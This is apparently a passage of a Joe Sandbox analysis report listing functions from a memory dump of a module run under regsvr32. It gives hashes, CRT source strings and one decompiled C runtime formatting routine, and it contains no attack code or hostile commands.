                                0x7fef9d33e93
                                0x7fef9d33e95
                                0x7fef9d33e9a
                                0x7fef9d33eb8
                                0x7fef9d33ec2
                                0x7fef9d33edf
                                0x7fef9d33eee
                                0x7fef9d33eff
                                0x7fef9d33f15
                                0x7fef9d33f1b
                                0x7fef9d33f27
                                0x7fef9d33f29
                                0x7fef9d33f3d
                                0x7fef9d33f42
                                0x7fef9d33f44
                                0x7fef9d33f53
                                0x7fef9d33f67
                                0x7fef9d33f79
                                0x7fef9d33f8e
                                0x7fef9d33f9c
                                0x7fef9d33fa4
                                0x7fef9d33fa6
                                0x7fef9d33fbe
                                0x7fef9d33fc3
                                0x7fef9d33fc5
                                0x7fef9d33fd3
                                0x7fef9d33fd8
                                0x7fef9d33fde
                                0x7fef9d33fe8
                                0x7fef9d33ff4
                                0x7fef9d34000
                                0x7fef9d3400c
                                0x7fef9d34035
                                0x7fef9d3403f
                                0x7fef9d34049
                                0x7fef9d34055
                                0x7fef9d34061
                                0x7fef9d3406d
                                0x7fef9d34092
                                0x7fef9d340a0

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _inconsistency
                                • String ID: csm$csm
                                • API String ID: 32975420-3733052814
                                • Opcode ID: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                • Instruction ID: 322b6d8969e66d64c69545eab8578d1d9fa1a0c6b52bdd8827c0b0ea251a3b55
                                • Opcode Fuzzy Hash: b62b0453fdffd86c1ea8e56b24d9441da31a01f9fe07ee07632383c0adf59322
                                • Instruction Fuzzy Hash: 12A1EE3660CBC5C6D7B08B15E5447AEB7A0F385B95FA04126EACD87BA9CB3DD844CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D29640 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c, xrefs: 000007FEF9D29932
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __free_lconv_mon__free_lconv_num
                                • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                • API String ID: 2148069796-2706031433
                                • Opcode ID: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                • Instruction ID: d8e48e7000e52547e61d66b201573bb281919b8ac3286b667feec84700a76b7c
                                • Opcode Fuzzy Hash: 5d60d57c9e58d07f7621284f5e9f8ee1c279b3f05538a913626922df64b73307
                                • Instruction Fuzzy Hash: 60A11E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D29C10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                • String ID: @'/$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                • API String ID: 4112623284-1960733172
                                • Opcode ID: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                • Instruction ID: b519865c658f5b17901cea146d1bd99b4d455d983c8f9f0677e22a9713547b35
                                • Opcode Fuzzy Hash: 587d7c63c2f280d76f00a5a6279b212f57539b6122539f303ec6642172553049
                                • Instruction Fuzzy Hash: 8E911D3661DB8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D32772 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3717698799
                                • Opcode ID: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                • Instruction ID: f46ca83dba6c4e2be9a9571e906a820c6a216ec021220a7175966cdc7e38441f
                                • Opcode Fuzzy Hash: 9007319e5b81e0e19641b6dff6978a626c4b249898d68e368399ad5d9614f895
                                • Instruction Fuzzy Hash: EB810D31A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C719 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t212;
				signed char _t217;
				intOrPtr _t252;
				signed int _t327;
				signed int _t328;
				signed long long _t331;
				intOrPtr* _t354;
				signed long long _t379;

				_t327 = __rax;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t328 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t331 = _a824;
				_a832 = _t331;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t331;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t212 = _a116;
				_a116 = _a116 - 1;
				if (_t212 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t212 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t217 = _a816 + _a708;
				_a816 = _t217;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t217;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t252 = _a1060;
				_a876 = _t252;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t354;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t252 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t354 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                0x7fef9d3c719
                                0x7fef9d3c719
                                0x7fef9d3c724
                                0x7fef9d3c737
                                0x7fef9d3c739
                                0x7fef9d3c748
                                0x7fef9d3c74c
                                0x7fef9d3c756
                                0x7fef9d3c769
                                0x7fef9d3c76f
                                0x7fef9d3c782
                                0x7fef9d3c78c
                                0x7fef9d3c791
                                0x7fef9d3c799
                                0x7fef9d3c7a9
                                0x7fef9d3c7b3
                                0x7fef9d3c7b8
                                0x7fef9d3c7c0
                                0x7fef9d3c7ce
                                0x7fef9d3c7d9
                                0x7fef9d3c7e8
                                0x7fef9d3c7ec
                                0x7fef9d3c7f4
                                0x7fef9d3c7fe
                                0x7fef9d3c806
                                0x7fef9d3c80e
                                0x7fef9d3c819
                                0x7fef9d3c823
                                0x7fef9d3c82a
                                0x7fef9d3c832
                                0x7fef9d3c83c
                                0x7fef9d3c843
                                0x7fef9d3c854
                                0x7fef9d3c85f
                                0x7fef9d3c86c
                                0x7fef9d3c878
                                0x7fef9d3c880
                                0x7fef9d3c882
                                0x7fef9d3c88a
                                0x7fef9d3c89d
                                0x7fef9d3c8aa
                                0x7fef9d3c8bf
                                0x7fef9d3c8cc
                                0x7fef9d3c8ce
                                0x7fef9d3c8d6
                                0x7fef9d3c8df
                                0x7fef9d3c8eb
                                0x7fef9d3c8ed
                                0x7fef9d3c8fe
                                0x7fef9d3c900
                                0x7fef9d3c910
                                0x7fef9d3c915
                                0x7fef9d3c91f
                                0x7fef9d3c925
                                0x7fef9d3c930
                                0x7fef9d3c93b
                                0x7fef9d3c95e
                                0x7fef9d3c96a
                                0x7fef9d3c997
                                0x7fef9d3c9a9
                                0x7fef9d3c9ab
                                0x7fef9d3c9bf
                                0x7fef9d3c9c9
                                0x7fef9d3c9ce
                                0x7fef9d3c9e0
                                0x7fef9d3c9ec
                                0x7fef9d3c9fc
                                0x7fef9d3ca03
                                0x7fef9d3ca10
                                0x7fef9d3ca1a
                                0x7fef9d3ca24
                                0x7fef9d3ca2d
                                0x7fef9d3ca36
                                0x7fef9d3ca45
                                0x7fef9d3ca52
                                0x7fef9d3ca54
                                0x7fef9d3ca59
                                0x7fef9d3ca61
                                0x7fef9d3ca6c
                                0x7fef9d3ca6e
                                0x7fef9d3ca73
                                0x7fef9d3ca7b
                                0x7fef9d3ca86
                                0x7fef9d3ca88
                                0x7fef9d3ca8d
                                0x7fef9d3caa5
                                0x7fef9d3cab5
                                0x7fef9d3cad0
                                0x7fef9d3caee
                                0x7fef9d3cafc
                                0x7fef9d3cb07
                                0x7fef9d3cb22
                                0x7fef9d3cb2c
                                0x7fef9d3cb37
                                0x7fef9d3cb3d
                                0x7fef9d3cb4d
                                0x7fef9d3cb59
                                0x7fef9d3cb70
                                0x7fef9d3cb79
                                0x7fef9d3cb8a
                                0x7fef9d3cb92
                                0x7fef9d3cb9b
                                0x7fef9d3cbb6
                                0x7fef9d3cbc9
                                0x7fef9d3cbd9
                                0x7fef9d3cbe3
                                0x7fef9d3cbe5
                                0x7fef9d3cbf0
                                0x7fef9d3cc11
                                0x7fef9d3cc16
                                0x7fef9d3cc1b
                                0x7fef9d3cc36
                                0x7fef9d3cc43
                                0x7fef9d3cc4e
                                0x7fef9d3cc69
                                0x7fef9d3cc74
                                0x7fef9d3cc80
                                0x7fef9d3cc85
                                0x7fef9d3cc8e
                                0x7fef9d3cc9b
                                0x7fef9d3cca5
                                0x7fef9d3cca7
                                0x7fef9d3ccb2
                                0x7fef9d3ccb4
                                0x7fef9d3ccbf
                                0x7fef9d3ccc6
                                0x7fef9d3ccd5
                                0x7fef9d3ccd7
                                0x7fef9d3ccde
                                0x7fef9d3cce3
                                0x7fef9d3cce6
                                0x7fef9d3ccf8
                                0x7fef9d3cd00
                                0x7fef9d3cd02
                                0x7fef9d3cd0d
                                0x7fef9d3cd0f
                                0x7fef9d3cd14
                                0x7fef9d3cd1a
                                0x7fef9d3cd23
                                0x7fef9d3cd3e
                                0x7fef9d3cd43
                                0x7fef9d3cd53
                                0x7fef9d3cd5f
                                0x7fef9d3cd68
                                0x7fef9d3cd74
                                0x7fef9d3cd97

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: get_int64_arg
                                • String ID: '$0$9
                                • API String ID: 1967237116-269856862
                                • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D35260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                • String ID: csm
                                • API String ID: 2005287440-1018135373
                                • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D28040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: FileModuleName__initmbctable
                                • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                • API String ID: 3548084100-1254873407
                                • Opcode ID: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                • Instruction ID: c1f8112261206beaa0fda4b6683aef0dc38e0cb6ee3d4e311a15053ab41967b3
                                • Opcode Fuzzy Hash: b22e410beffd46978b7d2afc3cd069083579849eea9e12d44582c014dad21e95
                                • Instruction Fuzzy Hash: 47411C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D328E8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                • API String ID: 2123368286-3717698799
                                • Opcode ID: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                • Instruction ID: 7c05dd3e5b110925f13ad37327732dcd8002d47ee9d5ea83dce110c9ec813185
                                • Opcode Fuzzy Hash: 902fc8e7192f88527d8aa4075598999d81e9371814558b5bb1293b80f5ddf804
                                • Instruction Fuzzy Hash: B6412931E1C7868AEAB08B24E8447AE62E0F385365F604335D6ED427F5DB3EE444CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27816 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                • API String ID: 2306298712-3864165772
                                • Opcode ID: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                • Instruction ID: 3bda70979e2781d9fddcfcf2e5c0164bb67a8e60ab66e06e656835f18ed7d390
                                • Opcode Fuzzy Hash: f14d95e79dbe0c44160fd2e577ceb585774a34057722467733e8b2231de90ff9
                                • Instruction Fuzzy Hash: 3A313D72A09BC585E7B08B19E84076E73E1F385764F618225CAED877E4DB3DE405CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D37F0E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                • API String ID: 2123368286-2562677240
                                • Opcode ID: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                • Instruction ID: 93e11cc603146a2a446790da906b27a7af07cbd58e629032b7549c60c7683809
                                • Opcode Fuzzy Hash: f1a9f826516545701b922f50b6ebdc9d8be9d112825cbb7a30042366d5f9c4a9
                                • Instruction Fuzzy Hash: 4A311632A0DB8685EAB09B15E8407AEB7E1F385390F204225D6DD03BE8DB7ED444CB02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D40680 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter$__doserrno
                                • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                • API String ID: 1181141450-2845860089
                                • Opcode ID: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                • Instruction ID: 33c12517d78d4ed4392c0426817be49b117e9f4526535de823d8000f08003729
                                • Opcode Fuzzy Hash: 60dcfdadd0e03516a84dc335c67980ba4999d51805a5974115e67aa140ed36a2
                                • Instruction Fuzzy Hash: 81315A36A28A4686E7909B18E88476E77E0F380794F205125F6CE47BF5CB7ED841CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3AB10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
